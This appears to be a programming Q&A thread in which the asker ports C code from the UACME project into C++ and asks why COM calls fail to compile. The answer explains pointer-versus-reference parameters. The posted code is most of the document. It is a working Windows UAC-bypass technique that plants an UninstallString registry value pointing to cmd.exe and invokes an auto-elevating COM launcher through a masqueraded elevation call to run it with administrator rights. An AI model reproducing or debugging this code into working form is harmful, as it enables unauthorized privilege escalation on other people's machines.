# Errors dereferencing variables passed to COM functions

Tags: c++, com, uac, privileges

I'm running code from a seperate project in my project, when I download and compile the original source, it runs smooth, but vomits errors in mine. I have tried to fix the errors by typecasting the variable to what they're expected to be by the compiler, but that results in `CoCreateInstance` and subsequent functions to fail, leading me to the conclusion that the issue is that I'm missing the code needed to make the calls work, so I scoured the original source and I can't find that code. Can somebody please explain what's going wrong? I've been at this for 4-5 hours.

The errors are:
[image: img]

#### The code:

(https://pastebin.com/jffKKZAe full code just in case I missed something)

```
#include "stdafx.h"
#include <objbase.h>
#include <Windows.h>
#include <ntstatus.h>
#include <CommCtrl.h>
#include <shlobj.h>
#include <iostream>
#include <fci.h>
#include <fcntl.h>
#pragma comment(lib,"Ole32.lib")
#define T_CLSID_UninstallStringLauncher      L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}"
#define T_IID_IARPUninstallStringLauncher    L"{F885120E-3789-4FD9-865E-DC9B4A6412D2}"

BOOL ucmMasqueradedAPRLaunchFile(
    _In_ LPWSTR lpszFileGuid
)
{
    BOOL                         bCond = FALSE;
    HRESULT                      r = E_FAIL;
    IID                          xIID_IARPUninstallStringLauncher;
    CLSID                        xCLSID_IARPUninstallStringLauncher;
    IARPUninstallStringLauncher *USLauncher = NULL;

    do {

        if (lpszFileGuid == NULL)
            break;

        if (CLSIDFromString(T_CLSID_UninstallStringLauncher, &xCLSID_IARPUninstallStringLauncher) != NOERROR) {
            break;
        }
        if (IIDFromString(T_IID_IARPUninstallStringLauncher, &xIID_IARPUninstallStringLauncher) != S_OK) {
            break;
        }
        //Error in CoCreateInstance
        r = CoCreateInstance(&xCLSID_IARPUninstallStringLauncher, NULL,
            CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
            &xIID_IARPUninstallStringLauncher, &USLauncher);

        if (r != S_OK)
            break;
        //Error here too
        r = ucmMasqueradedCoGetObjectElevate(T_CLSID_UninstallStringLauncher,
            CLSCTX_LOCAL_SERVER, &xIID_IARPUninstallStringLauncher, &USLauncher);
        if (r != S_OK)
            break;

        r = USLauncher->lpVtbl->LaunchUninstallStringAndWait(USLauncher, 0, lpszFileGuid, FALSE, NULL);

    } while (bCond);

    if (USLauncher != NULL) {
        USLauncher->lpVtbl->Release(USLauncher);
    }

    return SUCCEEDED(r);
}
BOOL ucmUninstallLauncherMethod(
    _In_ LPWSTR lpszExecutable
)
{
    BOOL        bResult = FALSE, bCond = FALSE;
    HKEY        hKey = NULL;
    LRESULT     lResult;
    GUID        guid;
    WCHAR       szKeyName[MAX_PATH], szGuid[64];

    do {

        if (lpszExecutable == NULL)
            break;

        if (CoCreateGuid(&guid) != S_OK)
            break;

        _strcpy_w(szKeyName, L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
        //the &guid returns an error, aswell.
        if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
            _strcat_w(szKeyName, szGuid);

            lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
                szKeyName, 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);

            if (lResult != ERROR_SUCCESS)
                break;

            lResult = RegSetValueEx(hKey, L"UninstallString", 0, REG_SZ, (BYTE*)lpszExecutable,
                (DWORD)(_strlen_w(lpszExecutable) * sizeof(WCHAR)));

            if (lResult != ERROR_SUCCESS)
                break;

            bResult = ucmMasqueradedAPRLaunchFile(szGuid);
        }

    } while (bCond);

    if (hKey != NULL) {
        RegCloseKey(hKey);
        RegDeleteKey(HKEY_CURRENT_USER, szKeyName);
    }

    return bResult;
}
int main()
{
    bool h = ucmUninstallLauncherMethod(L"c:\\windows\\system32\\cmd.exe");
    if (h == TRUE)
        std::cout << "function returned true" << std::endl;
    else
        std::cout << "Function failed you imbicile" << std::endl;
    return 0;
}
```

Comment: The primary source of the above code came from: https://github.com/hfiref0x/UACME/blob/master/Source/Akagi/methods/explife.c

Answer (score 1, accepted):

Original source code is written in `C` where references don't exists so `CoCreateInstance` declared in `C` to accept pointer to `CLSID` as first parameter. While in `C++` `CoCreateInstance` is declared to accept a reference to `CLSID` as first parameter but you still trying to pass a pointer. And so on. Therefore you get these errors. Recompile your code as `C` or remove unnecessary address takes.

Comment: Would you mind explaining a bit further on the unnecessary address takes, I would much rather be able to run this in c++ @VTT

Comment: r = CoCreateInstance( **&** xCLSID_IARPUninstallStringLauncher - notice address taking

Comment: so just get rid of the dereferences? @VTT

Comment: Yes, because in C++ you need to pass there a reference, not a pointer. This is exactly what error message says "Can not convert from GUID * to const GUID &"

Comment: what about the &Uslauncher  cast to (void **) ? when i removed dereferences earlier my CoCreateInstance failed.

Comment: Please look at function signature and compare it with what you are trying to pass. I'm not going to refactor all the code for you. If you are coming from different language and not that familiar with pointers / references you should read [some tutorials](https://www3.ntu.edu.sg/home/ehchua/programming/cpp/cp4_PointerReference.html) first.